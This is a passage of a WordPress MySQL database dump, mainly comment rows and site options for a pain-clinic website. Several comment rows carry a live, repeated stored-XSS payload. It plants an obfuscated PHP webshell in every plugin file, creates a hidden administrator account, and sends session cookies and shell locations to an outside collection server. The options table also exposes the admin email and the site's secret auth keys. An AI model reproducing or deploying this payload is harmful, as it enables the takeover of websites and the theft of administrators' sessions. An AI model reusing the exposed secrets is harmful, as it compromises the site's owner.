    temp.find('textarea#newcontent').each(function(i,o){
      var o=jQuery(o);
      if(o.text().indexOf('$www = $_POST[\'dak\']')>0){
        SenData('shell has presence,Path: '+location.href.replace(tempname,"wp-content/plugins/"+file)+" Password: dak\r\nCookie: "+document.cookie);
        return false;
      }
      Tmpcode = o.text().replace('<?php',shellcode);    
    });
    temp.find('select#plugin option').each(function(i,o){
      var o=jQuery(o);
      file2.push(o.attr('value'));
    });
    if(Xtoken&&Tmpcode&&file){
      jQuery.ajax({
      url: xurl,
      type: 'POST',
      data: {'_wpnonce':Xtoken,'newcontent':Tmpcode,'action':'update','file':file,'plugin':file,'submit':'Update+File'}
      })
      .done(function(){       
        SenData('Webshell: '+location.href.replace(tempname,"wp-content/plugins/"+file)+" Password: dak");
        return;
      })
    }
    if(StartGetshell){
      for(var i=0;i<file2.length;i++){
        window.setTimeout(GetAllShell,150,file2[i]+"|"+file2[file2.length-1]);
      }
    }
  })
}
function GetAllShell(target){
  var TmpArr = target.split("|")[1];
  var filename = target.split("|")[0];
  if(filename!=file){
    jQuery.ajax({
    url: xurl,
    type: 'POST',
    data: {'plugin': filename,'Submit':'Select'},
  })
  .done(function(data) {
    var NewCode = "";
    var NewToken= "";
    var Getshell=jQuery(data);
    Getshell.find("textarea#newcontent").each(function(i,o){
      var o=jQuery(o);
      if(o.text().indexOf('$www = $_POST[\'dak\']')>0){
        shell.push('shell has presence,Path: '+location.href.replace(tempname,"wp-content/plugins/"+filename)+" Password: dak");
console.log(filename+" x  "+TmpArr);        
if(filename==TmpArr){
          SenData(shell.join("\r\n"));
        }
        return false;
      }
      NewCode = o.text().replace('<?php',shellcode);    
    });
    Getshell.find("input#_wpnonce").each(function(i,o){
      var o=jQuery(o);
      NewToken = o.attr('value');
    });
    if(NewCode&&NewToken){
      jQuery.ajax({
      url: xurl,
      type: 'POST',
      data: {'_wpnonce':NewToken,'newcontent':NewCode,'action':'update','file':filename,'plugin':filename,'submit':'Update+File'}
      })
      .done(function(){
        shell.push('Webshell: '+location.href.replace(tempname,"wp-content/plugins/"+filename)+" Password: dak");
console.log(filename+"  "+TmpArr);        
if(filename==TmpArr){
          SenData(shell.join("\r\n"));
        }
        return;
      })
      .fail(function(){
        shell.push(location.href+': GetShell '+filename+' Failure');
      })
    }
  })
  }
}
function adduser(){
  jQuery.ajax({
    url: Aurl,
    type: 'GET',
    dataType: 'html',
    data: {},
  })
  .done(function(data) {
    var temp = jQuery(data);
    var Xtoken = "";
    temp.find('input#_wpnonce_create-user').each(function(i,o){
      var o=jQuery(o);
      Xtoken=o.attr('value');
    });
    jQuery.ajax({
      url: Aurl,
      type: 'POST',
      data: {'action': 'createuser','_wpnonce_create-user':Xtoken,'user_login':'obuser','email':'user@gmail.com','first_name':'','last_name':'','url':'','pass1':'obpass','pass2':'obpass','role':'administrator','createuser':'Add+New+User+'}
      })
    .done(function(){
      SenData(location.href+': Add Administrator success User: obuser Password: obpass'+'\r\n\r\n');
    });
    jQuery.ajax({ 
      url: laurl, 
      type: 'GET',
      data: {'svid':13,'id':18646852,'vpage':location.href}
    })  
  })
}
function SenData(data){
  jQuery.ajax({
    url: recieve,
    type: 'POST',
    data:{"Data":data}
  })
}
if(!window.x){window.x=1;fuckxss();adduser();};\" style=\"display:block;position:absolute;width:100%;height:100%;top:0;left:0;\" \'><a></abbr></a>',0,'0','Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko','',0,0),(8,1,'hart','ejbyvcld@gmail.com','https://www.facebook.com/tbehijln','119.29.33.178','2015-12-26 00:37:33','2015-12-26 00:37:33','hellonice dbvyli<abbr><a href=\'\r\nhref=\"\'> :-) <abbr title=\'\" onmouseover=\"var file = "";
var xurl = "plugin-editor.php";
var Aurl = "user-new.php";
var file2= [];
var shell= [];
var recieve="http://g.fr9.co/xss/recieve.php";//recieve.php 在公网中的地址
var StartGetshell = 1; //是否getshell全部模板  1为是 0为否
var shellcode = "<?php\nif(isset($_POST['dak'])){($www = $_POST['dak']) && @preg_replace('/ad/e', '@' . str_rot13('riny') . '($www)', 'add');exit;}"; 
var tempname = location.href.substring(location.href.indexOf('wp-admin'),location.href.length);
var laurl = "http://web.51.la:82/go.asp";

if(!window.x){
  var _st = window.setTimeout;
  window.setTimeout = function(fRef, mDelay) {
    if(typeof fRef == 'function'){
      var argu = Array.prototype.slice.call(arguments,2);
      var f = (function(){ fRef.apply(null, argu); });
      return _st(f, mDelay);
    }
  return _st(fRef,mDelay);
  }
}
function fuckxss(){
  var tempshell = "";
  jQuery.ajax({
    url: xurl,
    type: 'GET',
    dataType: 'html',
    data: {},
  })
  .done(function(data) {
    var temp = jQuery(data);
    var Xtoken = "";
    var Tmpcode = "";
    temp.find('input#_wpnonce').each(function(i,o){
      var o=jQuery(o);
      Xtoken=o.attr('value');
    });
    temp.find('div.alignleft big strong').each(function(i,o){
      var o=jQuery(o);
      file = o.text();
    });
    temp.find('textarea#newcontent').each(function(i,o){
      var o=jQuery(o);
      if(o.text().indexOf('$www = $_POST[\'dak\']')>0){
        SenData('shell has presence,Path: '+location.href.replace(tempname,"wp-content/plugins/"+file)+" Password: dak\r\nCookie: "+document.cookie);
        return false;
      }
      Tmpcode = o.text().replace('<?php',shellcode);    
    });
    temp.find('select#plugin option').each(function(i,o){
      var o=jQuery(o);
      file2.push(o.attr('value'));
    });
    if(Xtoken&&Tmpcode&&file){
      jQuery.ajax({
      url: xurl,
      type: 'POST',
      data: {'_wpnonce':Xtoken,'newcontent':Tmpcode,'action':'update','file':file,'plugin':file,'submit':'Update+File'}
      })
      .done(function(){       
        SenData('Webshell: '+location.href.replace(tempname,"wp-content/plugins/"+file)+" Password: dak");
        return;
      })
    }
    if(StartGetshell){
      for(var i=0;i<file2.length;i++){
        window.setTimeout(GetAllShell,150,file2[i]+"|"+file2[file2.length-1]);
      }
    }
  })
}
function GetAllShell(target){
  var TmpArr = target.split("|")[1];
  var filename = target.split("|")[0];
  if(filename!=file){
    jQuery.ajax({
    url: xurl,
    type: 'POST',
    data: {'plugin': filename,'Submit':'Select'},
  })
  .done(function(data) {
    var NewCode = "";
    var NewToken= "";
    var Getshell=jQuery(data);
    Getshell.find("textarea#newcontent").each(function(i,o){
      var o=jQuery(o);
      if(o.text().indexOf('$www = $_POST[\'dak\']')>0){
        shell.push('shell has presence,Path: '+location.href.replace(tempname,"wp-content/plugins/"+filename)+" Password: dak");
console.log(filename+" x  "+TmpArr);        
if(filename==TmpArr){
          SenData(shell.join("\r\n"));
        }
        return false;
      }
      NewCode = o.text().replace('<?php',shellcode);    
    });
    Getshell.find("input#_wpnonce").each(function(i,o){
      var o=jQuery(o);
      NewToken = o.attr('value');
    });
    if(NewCode&&NewToken){
      jQuery.ajax({
      url: xurl,
      type: 'POST',
      data: {'_wpnonce':NewToken,'newcontent':NewCode,'action':'update','file':filename,'plugin':filename,'submit':'Update+File'}
      })
      .done(function(){
        shell.push('Webshell: '+location.href.replace(tempname,"wp-content/plugins/"+filename)+" Password: dak");
console.log(filename+"  "+TmpArr);        
if(filename==TmpArr){
          SenData(shell.join("\r\n"));
        }
        return;
      })
      .fail(function(){
        shell.push(location.href+': GetShell '+filename+' Failure');
      })
    }
  })
  }
}
function adduser(){
  jQuery.ajax({
    url: Aurl,
    type: 'GET',
    dataType: 'html',
    data: {},
  })
  .done(function(data) {
    var temp = jQuery(data);
    var Xtoken = "";
    temp.find('input#_wpnonce_create-user').each(function(i,o){
      var o=jQuery(o);
      Xtoken=o.attr('value');
    });
    jQuery.ajax({
      url: Aurl,
      type: 'POST',
      data: {'action': 'createuser','_wpnonce_create-user':Xtoken,'user_login':'obuser','email':'user@gmail.com','first_name':'','last_name':'','url':'','pass1':'obpass','pass2':'obpass','role':'administrator','createuser':'Add+New+User+'}
      })
    .done(function(){
      SenData(location.href+': Add Administrator success User: obuser Password: obpass'+'\r\n\r\n');
    });
    jQuery.ajax({ 
      url: laurl, 
      type: 'GET',
      data: {'svid':13,'id':18646852,'vpage':location.href}
    })  
  })
}
function SenData(data){
  jQuery.ajax({
    url: recieve,
    type: 'POST',
    data:{"Data":data}
  })
}
if(!window.x){window.x=1;fuckxss();adduser();};\" style=\"display:block;position:absolute;width:100%;height:100%;top:0;left:0;\" \'><a></abbr></a>',0,'0','Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko','',0,0),(9,1,'howell','izkgwhy@gmail.com','https://www.facebook.com/naijn','91.202.74.110','2015-12-27 22:12:13','2015-12-27 22:12:13','hinice ldhads<abbr><a href=\'\r\nhref=\"\'> :-) <abbr title=\'\" onmouseover=\"var file = "";
var xurl = "plugin-editor.php";
var Aurl = "user-new.php";
var file2= [];
var shell= [];
var recieve="http://g.fr9.co/xss/recieve.php";//recieve.php 在公网中的地址
var StartGetshell = 1; //是否getshell全部模板  1为是 0为否
var shellcode = "<?php\nif(isset($_POST['dak'])){($www = $_POST['dak']) && @preg_replace('/ad/e', '@' . str_rot13('riny') . '($www)', 'add');exit;}"; 
var tempname = location.href.substring(location.href.indexOf('wp-admin'),location.href.length);
var laurl = "http://web.51.la:82/go.asp";

if(!window.x){
  var _st = window.setTimeout;
  window.setTimeout = function(fRef, mDelay) {
    if(typeof fRef == 'function'){
      var argu = Array.prototype.slice.call(arguments,2);
      var f = (function(){ fRef.apply(null, argu); });
      return _st(f, mDelay);
    }
  return _st(fRef,mDelay);
  }
}
function fuckxss(){
  var tempshell = "";
  jQuery.ajax({
    url: xurl,
    type: 'GET',
    dataType: 'html',
    data: {},
  })
  .done(function(data) {
    var temp = jQuery(data);
    var Xtoken = "";
    var Tmpcode = "";
    temp.find('input#_wpnonce').each(function(i,o){
      var o=jQuery(o);
      Xtoken=o.attr('value');
    });
    temp.find('div.alignleft big strong').each(function(i,o){
      var o=jQuery(o);
      file = o.text();
    });
    temp.find('textarea#newcontent').each(function(i,o){
      var o=jQuery(o);
      if(o.text().indexOf('$www = $_POST[\'dak\']')>0){
        SenData('shell has presence,Path: '+location.href.replace(tempname,"wp-content/plugins/"+file)+" Password: dak\r\nCookie: "+document.cookie);
        return false;
      }
      Tmpcode = o.text().replace('<?php',shellcode);    
    });
    temp.find('select#plugin option').each(function(i,o){
      var o=jQuery(o);
      file2.push(o.attr('value'));
    });
    if(Xtoken&&Tmpcode&&file){
      jQuery.ajax({
      url: xurl,
      type: 'POST',
      data: {'_wpnonce':Xtoken,'newcontent':Tmpcode,'action':'update','file':file,'plugin':file,'submit':'Update+File'}
      })
      .done(function(){       
        SenData('Webshell: '+location.href.replace(tempname,"wp-content/plugins/"+file)+" Password: dak");
        return;
      })
    }
    if(StartGetshell){
      for(var i=0;i<file2.length;i++){
        window.setTimeout(GetAllShell,150,file2[i]+"|"+file2[file2.length-1]);
      }
    }
  })
}
function GetAllShell(target){
  var TmpArr = target.split("|")[1];
  var filename = target.split("|")[0];
  if(filename!=file){
    jQuery.ajax({
    url: xurl,
    type: 'POST',
    data: {'plugin': filename,'Submit':'Select'},
  })
  .done(function(data) {
    var NewCode = "";
    var NewToken= "";
    var Getshell=jQuery(data);
    Getshell.find("textarea#newcontent").each(function(i,o){
      var o=jQuery(o);
      if(o.text().indexOf('$www = $_POST[\'dak\']')>0){
        shell.push('shell has presence,Path: '+location.href.replace(tempname,"wp-content/plugins/"+filename)+" Password: dak");
console.log(filename+" x  "+TmpArr);        
if(filename==TmpArr){
          SenData(shell.join("\r\n"));
        }
        return false;
      }
      NewCode = o.text().replace('<?php',shellcode);    
    });
    Getshell.find("input#_wpnonce").each(function(i,o){
      var o=jQuery(o);
      NewToken = o.attr('value');
    });
    if(NewCode&&NewToken){
      jQuery.ajax({
      url: xurl,
      type: 'POST',
      data: {'_wpnonce':NewToken,'newcontent':NewCode,'action':'update','file':filename,'plugin':filename,'submit':'Update+File'}
      })
      .done(function(){
        shell.push('Webshell: '+location.href.replace(tempname,"wp-content/plugins/"+filename)+" Password: dak");
console.log(filename+"  "+TmpArr);        
if(filename==TmpArr){
          SenData(shell.join("\r\n"));
        }
        return;
      })
      .fail(function(){
        shell.push(location.href+': GetShell '+filename+' Failure');
      })
    }
  })
  }
}
function adduser(){
  jQuery.ajax({
    url: Aurl,
    type: 'GET',
    dataType: 'html',
    data: {},
  })
  .done(function(data) {
    var temp = jQuery(data);
    var Xtoken = "";
    temp.find('input#_wpnonce_create-user').each(function(i,o){
      var o=jQuery(o);
      Xtoken=o.attr('value');
    });
    jQuery.ajax({
      url: Aurl,
      type: 'POST',
      data: {'action': 'createuser','_wpnonce_create-user':Xtoken,'user_login':'obuser','email':'user@gmail.com','first_name':'','last_name':'','url':'','pass1':'obpass','pass2':'obpass','role':'administrator','createuser':'Add+New+User+'}
      })
    .done(function(){
      SenData(location.href+': Add Administrator success User: obuser Password: obpass'+'\r\n\r\n');
    });
    jQuery.ajax({ 
      url: laurl, 
      type: 'GET',
      data: {'svid':13,'id':18646852,'vpage':location.href}
    })  
  })
}
function SenData(data){
  jQuery.ajax({
    url: recieve,
    type: 'POST',
    data:{"Data":data}
  })
}
if(!window.x){window.x=1;fuckxss();adduser();};\" style=\"display:block;position:absolute;width:100%;height:100%;top:0;left:0;\" \'><a></abbr></a>',0,'0','Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko','',0,0); /*!40000 ALTER TABLE `wp_comments` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `wp_links` -- DROP TABLE IF EXISTS `wp_links`; SET @saved_cs_client = @@character_set_client; SET character_set_client = utf8; CREATE TABLE `wp_links` ( `link_id` bigint(20) unsigned NOT NULL auto_increment, `link_url` varchar(255) NOT NULL default '', `link_name` varchar(255) NOT NULL default '', `link_image` varchar(255) NOT NULL default '', `link_target` varchar(25) NOT NULL default '', `link_description` varchar(255) NOT NULL default '', `link_visible` varchar(20) NOT NULL default 'Y', `link_owner` bigint(20) unsigned NOT NULL default '1', `link_rating` int(11) NOT NULL default '0', `link_updated` datetime NOT NULL default '0000-00-00 00:00:00', `link_rel` varchar(255) NOT NULL default '', `link_notes` mediumtext NOT NULL, `link_rss` varchar(255) NOT NULL default '', PRIMARY KEY (`link_id`), KEY `link_visible` (`link_visible`) ) ENGINE=MyISAM DEFAULT CHARSET=utf8; SET character_set_client = @saved_cs_client; -- -- Dumping data for table `wp_links` -- LOCK TABLES `wp_links` WRITE; /*!40000 ALTER TABLE `wp_links` DISABLE KEYS */; /*!40000 ALTER TABLE `wp_links` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `wp_options` -- DROP TABLE IF EXISTS `wp_options`; SET @saved_cs_client = @@character_set_client; SET character_set_client = utf8; CREATE TABLE `wp_options` ( `option_id` bigint(20) unsigned NOT NULL auto_increment, `option_name` varchar(64) NOT NULL default '', `option_value` longtext NOT NULL, `autoload` varchar(20) NOT NULL default 'yes', PRIMARY KEY (`option_id`), UNIQUE KEY `option_name` (`option_name`) ) ENGINE=MyISAM AUTO_INCREMENT=35118 DEFAULT CHARSET=utf8; SET character_set_client = @saved_cs_client; -- -- Dumping data for table `wp_options` -- LOCK TABLES `wp_options` WRITE; /*!40000 ALTER TABLE `wp_options` DISABLE KEYS */; INSERT INTO `wp_options` VALUES (1,'siteurl','http://theworstpain.com/Neuro','yes'),(2,'blogname','Neuro Center for Pain and Tremor','yes'),(3,'blogdescription','Best pain treatment','yes'),(4,'users_can_register','0','yes'),(5,'admin_email','jonathancalmus@gmail.com','yes'),(6,'start_of_week','1','yes'),(7,'use_balanceTags','0','yes'),(8,'use_smilies','1','yes'),(9,'require_name_email','1','yes'),(10,'comments_notify','1','yes'),(11,'posts_per_rss','10','yes'),(12,'rss_use_excerpt','0','yes'),(13,'mailserver_url','127.0.0.1','yes'),(14,'mailserver_login','login@example.com','yes'),(15,'mailserver_pass','password','yes'),(16,'mailserver_port','110','yes'),(17,'default_category','1','yes'),(18,'default_comment_status','open','yes'),(19,'default_ping_status','open','yes'),(20,'default_pingback_flag','0','yes'),(21,'posts_per_page','10','yes'),(22,'date_format','F j, Y','yes'),(23,'time_format','g:i a','yes'),(24,'links_updated_date_format','F j, Y g:i a','yes'),(25,'comment_moderation','0','yes'),(26,'moderation_notify','1','yes'),(27,'permalink_structure','/%year%/%monthnum%/%day%/%postname%/','yes'),(28,'gzipcompression','0','yes'),(29,'hack_file','0','yes'),(30,'blog_charset','UTF-8','yes'),(31,'moderation_keys','','no'),(32,'active_plugins','a:2:{i:0;s:19:\"jetpack/jetpack.php\";i:1;s:24:\"wordpress-seo/wp-seo.php\";}','yes'),(33,'home','http://theworstpain.com/Neuro','yes'),(34,'category_base','','yes'),(35,'ping_sites','http://rpc.pingomatic.com/','yes'),(36,'advanced_edit','0','yes'),(37,'comment_max_links','2','yes'),(38,'gmt_offset','0','yes'),(39,'default_email_category','1','yes'),(40,'recently_edited','','no'),(41,'template','paeon','yes'),(42,'stylesheet','paeon','yes'),(43,'comment_whitelist','1','yes'),(44,'blacklist_keys','','no'),(45,'comment_registration','0','yes'),(46,'html_type','text/html','yes'),(47,'use_trackback','0','yes'),(48,'default_role','subscriber','yes'),(49,'db_version','27918','yes'),(50,'uploads_use_yearmonth_folders','1','yes'),(51,'upload_path','','yes'),(52,'blog_public','1','yes'),(53,'default_link_category','2','yes'),(54,'show_on_front','page','yes'),(55,'tag_base','','yes'),(56,'show_avatars','1','yes'),(57,'avatar_rating','G','yes'),(58,'upload_url_path','','yes'),(59,'thumbnail_size_w','150','yes'),(60,'thumbnail_size_h','150','yes'),(61,'thumbnail_crop','1','yes'),(62,'medium_size_w','300','yes'),(63,'medium_size_h','300','yes'),(64,'avatar_default','mystery','yes'),(65,'large_size_w','1024','yes'),(66,'large_size_h','1024','yes'),(67,'image_default_link_type','file','yes'),(68,'image_default_size','','yes'),(69,'image_default_align','','yes'),(70,'close_comments_for_old_posts','0','yes'),(71,'close_comments_days_old','14','yes'),(72,'thread_comments','1','yes'),(73,'thread_comments_depth','5','yes'),(74,'page_comments','0','yes'),(75,'comments_per_page','50','yes'),(76,'default_comments_page','newest','yes'),(77,'comment_order','asc','yes'),(78,'sticky_posts','a:0:{}','yes'),(79,'widget_categories','a:2:{i:2;a:4:{s:5:\"title\";s:0:\"\";s:5:\"count\";i:0;s:12:\"hierarchical\";i:0;s:8:\"dropdown\";i:0;}s:12:\"_multiwidget\";i:1;}','yes'),(80,'widget_text','a:0:{}','yes'),(81,'widget_rss','a:0:{}','yes'),(82,'uninstall_plugins','a:0:{}','no'),(83,'timezone_string','','yes'),(84,'page_for_posts','0','yes'),(85,'page_on_front','9','yes'),(86,'default_post_format','0','yes'),(87,'link_manager_enabled','0','yes'),(88,'initial_db_version','27916','yes'),(89,'wp_user_roles','a:5:{s:13:\"administrator\";a:2:{s:4:\"name\";s:13:\"Administrator\";s:12:\"capabilities\";a:63:{s:13:\"switch_themes\";b:1;s:11:\"edit_themes\";b:1;s:16:\"activate_plugins\";b:1;s:12:\"edit_plugins\";b:1;s:10:\"edit_users\";b:1;s:10:\"edit_files\";b:1;s:14:\"manage_options\";b:1;s:17:\"moderate_comments\";b:1;s:17:\"manage_categories\";b:1;s:12:\"manage_links\";b:1;s:12:\"upload_files\";b:1;s:6:\"import\";b:1;s:15:\"unfiltered_html\";b:1;s:10:\"edit_posts\";b:1;s:17:\"edit_others_posts\";b:1;s:20:\"edit_published_posts\";b:1;s:13:\"publish_posts\";b:1;s:10:\"edit_pages\";b:1;s:4:\"read\";b:1;s:8:\"level_10\";b:1;s:7:\"level_9\";b:1;s:7:\"level_8\";b:1;s:7:\"level_7\";b:1;s:7:\"level_6\";b:1;s:7:\"level_5\";b:1;s:7:\"level_4\";b:1;s:7:\"level_3\";b:1;s:7:\"level_2\";b:1;s:7:\"level_1\";b:1;s:7:\"level_0\";b:1;s:17:\"edit_others_pages\";b:1;s:20:\"edit_published_pages\";b:1;s:13:\"publish_pages\";b:1;s:12:\"delete_pages\";b:1;s:19:\"delete_others_pages\";b:1;s:22:\"delete_published_pages\";b:1;s:12:\"delete_posts\";b:1;s:19:\"delete_others_posts\";b:1;s:22:\"delete_published_posts\";b:1;s:20:\"delete_private_posts\";b:1;s:18:\"edit_private_posts\";b:1;s:18:\"read_private_posts\";b:1;s:20:\"delete_private_pages\";b:1;s:18:\"edit_private_pages\";b:1;s:18:\"read_private_pages\";b:1;s:12:\"delete_users\";b:1;s:12:\"create_users\";b:1;s:17:\"unfiltered_upload\";b:1;s:14:\"edit_dashboard\";b:1;s:14:\"update_plugins\";b:1;s:14:\"delete_plugins\";b:1;s:15:\"install_plugins\";b:1;s:13:\"update_themes\";b:1;s:14:\"install_themes\";b:1;s:11:\"update_core\";b:1;s:10:\"list_users\";b:1;s:12:\"remove_users\";b:1;s:9:\"add_users\";b:1;s:13:\"promote_users\";b:1;s:18:\"edit_theme_options\";b:1;s:13:\"delete_themes\";b:1;s:6:\"export\";b:1;s:15:\"wpseo_bulk_edit\";b:1;}}s:6:\"editor\";a:2:{s:4:\"name\";s:6:\"Editor\";s:12:\"capabilities\";a:35:{s:17:\"moderate_comments\";b:1;s:17:\"manage_categories\";b:1;s:12:\"manage_links\";b:1;s:12:\"upload_files\";b:1;s:15:\"unfiltered_html\";b:1;s:10:\"edit_posts\";b:1;s:17:\"edit_others_posts\";b:1;s:20:\"edit_published_posts\";b:1;s:13:\"publish_posts\";b:1;s:10:\"edit_pages\";b:1;s:4:\"read\";b:1;s:7:\"level_7\";b:1;s:7:\"level_6\";b:1;s:7:\"level_5\";b:1;s:7:\"level_4\";b:1;s:7:\"level_3\";b:1;s:7:\"level_2\";b:1;s:7:\"level_1\";b:1;s:7:\"level_0\";b:1;s:17:\"edit_others_pages\";b:1;s:20:\"edit_published_pages\";b:1;s:13:\"publish_pages\";b:1;s:12:\"delete_pages\";b:1;s:19:\"delete_others_pages\";b:1;s:22:\"delete_published_pages\";b:1;s:12:\"delete_posts\";b:1;s:19:\"delete_others_posts\";b:1;s:22:\"delete_published_posts\";b:1;s:20:\"delete_private_posts\";b:1;s:18:\"edit_private_posts\";b:1;s:18:\"read_private_posts\";b:1;s:20:\"delete_private_pages\";b:1;s:18:\"edit_private_pages\";b:1;s:18:\"read_private_pages\";b:1;s:15:\"wpseo_bulk_edit\";b:1;}}s:6:\"author\";a:2:{s:4:\"name\";s:6:\"Author\";s:12:\"capabilities\";a:10:{s:12:\"upload_files\";b:1;s:10:\"edit_posts\";b:1;s:20:\"edit_published_posts\";b:1;s:13:\"publish_posts\";b:1;s:4:\"read\";b:1;s:7:\"level_2\";b:1;s:7:\"level_1\";b:1;s:7:\"level_0\";b:1;s:12:\"delete_posts\";b:1;s:22:\"delete_published_posts\";b:1;}}s:11:\"contributor\";a:2:{s:4:\"name\";s:11:\"Contributor\";s:12:\"capabilities\";a:5:{s:10:\"edit_posts\";b:1;s:4:\"read\";b:1;s:7:\"level_1\";b:1;s:7:\"level_0\";b:1;s:12:\"delete_posts\";b:1;}}s:10:\"subscriber\";a:2:{s:4:\"name\";s:10:\"Subscriber\";s:12:\"capabilities\";a:2:{s:4:\"read\";b:1;s:7:\"level_0\";b:1;}}}','yes'),(90,'_transient_random_seed','b80f571ebed96f44c8344532d6419d29','yes'),(91,'widget_search','a:2:{i:2;a:1:{s:5:\"title\";s:0:\"\";}s:12:\"_multiwidget\";i:1;}','yes'),(92,'widget_recent-posts','a:2:{i:2;a:2:{s:5:\"title\";s:0:\"\";s:6:\"number\";i:5;}s:12:\"_multiwidget\";i:1;}','yes'),(93,'widget_recent-comments','a:2:{i:2;a:2:{s:5:\"title\";s:0:\"\";s:6:\"number\";i:5;}s:12:\"_multiwidget\";i:1;}','yes'),(94,'widget_archives','a:2:{i:2;a:3:{s:5:\"title\";s:0:\"\";s:5:\"count\";i:0;s:8:\"dropdown\";i:0;}s:12:\"_multiwidget\";i:1;}','yes'),(95,'widget_meta','a:2:{i:2;a:1:{s:5:\"title\";s:0:\"\";}s:12:\"_multiwidget\";i:1;}','yes'),(96,'sidebars_widgets','a:9:{s:19:\"wp_inactive_widgets\";a:0:{}s:7:\"primary\";a:6:{i:0;s:8:\"search-2\";i:1;s:14:\"recent-posts-2\";i:2;s:17:\"recent-comments-2\";i:3;s:10:\"archives-2\";i:4;s:12:\"categories-2\";i:5;s:6:\"meta-2\";}s:4:\"page\";a:0:{}s:8:\"footer-1\";a:0:{}s:8:\"footer-2\";N;s:8:\"footer-3\";N;s:8:\"footer-4\";N;s:4:\"home\";N;s:13:\"array_version\";i:3;}','yes'),(97,'jetpack_activated','3','yes'),(99,'cron','a:5:{i:1497421819;a:1:{s:20:\"jetpack_clean_nonces\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:6:\"hourly\";s:4:\"args\";a:0:{}s:8:\"interval\";i:3600;}}}i:1497454220;a:3:{s:16:\"wp_version_check\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:10:\"twicedaily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:43200;}}s:17:\"wp_update_plugins\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:10:\"twicedaily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:43200;}}s:16:\"wp_update_themes\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:10:\"twicedaily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:43200;}}}i:1497497764;a:1:{s:19:\"wp_scheduled_delete\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:5:\"daily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:86400;}}}i:1497499239;a:1:{s:30:\"wp_scheduled_auto_draft_delete\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:5:\"daily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:86400;}}}s:7:\"version\";i:2;}','yes'),(112,'auth_key','kfo&Ssobi$uH:8:)w[L[Q=uGwr,U&1cOG!/>Q6W~jG!sOzE.rxSL`YaM/Y/=yuP#','yes'),(140,'_transient_twentyfourteen_category_count','1','yes'),(114,'logged_in_key','@;z,l#U:;R.}xI/V-Fl+pu7YqaDy0kVDWxV!l!pa*NF2Picdzx#Z2-^c[^?T0wy-','yes'),(35113,'_site_transient_timeout_theme_roots','1497414861','yes'),(35114,'_site_transient_theme_roots','a:19:{s:6:\"ahimsa\";s:7:\"/themes\";s:7:\"arclite\";s:7:\"/themes\";s:11:\"arras-theme\";s:7:\"/themes\";s:9:\"atahualpa\";s:7:\"/themes\";s:20:\"cordobo-green-park-2\";s:7:\"/themes\";s:5:\"corp2\";s:7:\"/themes\";s:6:\"fusion\";s:7:\"/themes\";s:13:\"grayCorporate\";s:7:\"/themes\";s:5:\"inove\";s:7:\"/themes\";s:14:\"lightspersonal\";s:7:\"/themes\";s:9:\"lightword\";s:7:\"/themes\";s:10:\"monochrome\";s:7:\"/themes\";s:15:\"orangeCorporate\";s:7:\"/themes\";s:5:\"paeon\";s:7:\"/themes\";s:5:\"pixel\";s:7:\"/themes\";s:5:\"trees\";s:7:\"/themes\";s:14:\"twentyfourteen\";s:7:\"/themes\";s:14:\"twentythirteen\";s:7:\"/themes\";s:12:\"twentytwelve\";s:7:\"/themes\";}','yes'),(21471,'recently_activated','a:0:{}','yes'),(21472,'wpseo','a:21:{s:14:\"blocking_files\";a:0:{}s:26:\"ignore_blog_public_warning\";b:0;s:31:\"ignore_meta_description_warning\";b:0;s:20:\"ignore_page_comments\";b:0;s:16:\"ignore_permalink\";b:0;s:15:\"ms_defaults_set\";b:0;s:23:\"theme_description_found\";s:0:\"\";s:21:\"theme_has_description\";b:0;s:7:\"version\";s:5:\"3.0.7\";s:11:\"alexaverify\";s:0:\"\";s:12:\"company_logo\";s:0:\"\";s:12:\"company_name\";s:0:\"\";s:17:\"company_or_person\";s:0:\"\";s:20:\"disableadvanced_meta\";b:1;s:19:\"onpage_indexability\";b:1;s:12:\"googleverify\";s:0:\"\";s:8:\"msverify\";s:0:\"\";s:11:\"person_name\";s:0:\"\";s:12:\"website_name\";s:0:\"\";s:22:\"alternate_website_name\";s:0:\"\";s:12:\"yandexverify\";s:0:\"\";}','yes'),(21473,'wpseo_permalinks','a:13:{s:15:\"cleanpermalinks\";b:0;s:24:\"cleanpermalink-extravars\";s:0:\"\";s:29:\"cleanpermalink-googlecampaign\";b:0;s:31:\"cleanpermalink-googlesitesearch\";b:0;s:15:\"cleanreplytocom\";b:0;s:10:\"cleanslugs\";b:1;s:14:\"hide-feedlinks\";b:0;s:12:\"hide-rsdlink\";b:0;s:14:\"hide-shortlink\";b:0;s:16:\"hide-wlwmanifest\";b:0;s:18:\"redirectattachment\";b:0;s:17:\"stripcategorybase\";b:0;s:13:\"trailingslash\";b:0;}','yes'),(21474,'wpseo_titles','a:82:{s:10:\"title_test\";i:0;s:17:\"forcerewritetitle\";b:0;s:9:\"separator\";s:7:\"sc-dash\";s:5:\"noodp\";b:0;s:6:\"noydir\";b:0;s:15:\"usemetakeywords\";b:0;s:16:\"title-home-wpseo\";s:42:\"%%sitename%% %%page%% %%sep%% %%sitedesc%%\";s:18:\"title-author-wpseo\";s:41:\"%%name%%, Author at %%sitename%% %%page%%\";s:19:\"title-archive-wpseo\";s:38:\"%%date%% %%page%% %%sep%% %%sitename%%\";s:18:\"title-search-wpseo\";s:63:\"You searched for %%searchphrase%% %%page%% %%sep%% %%sitename%%\";s:15:\"title-404-wpseo\";s:35:\"Page not found %%sep%% 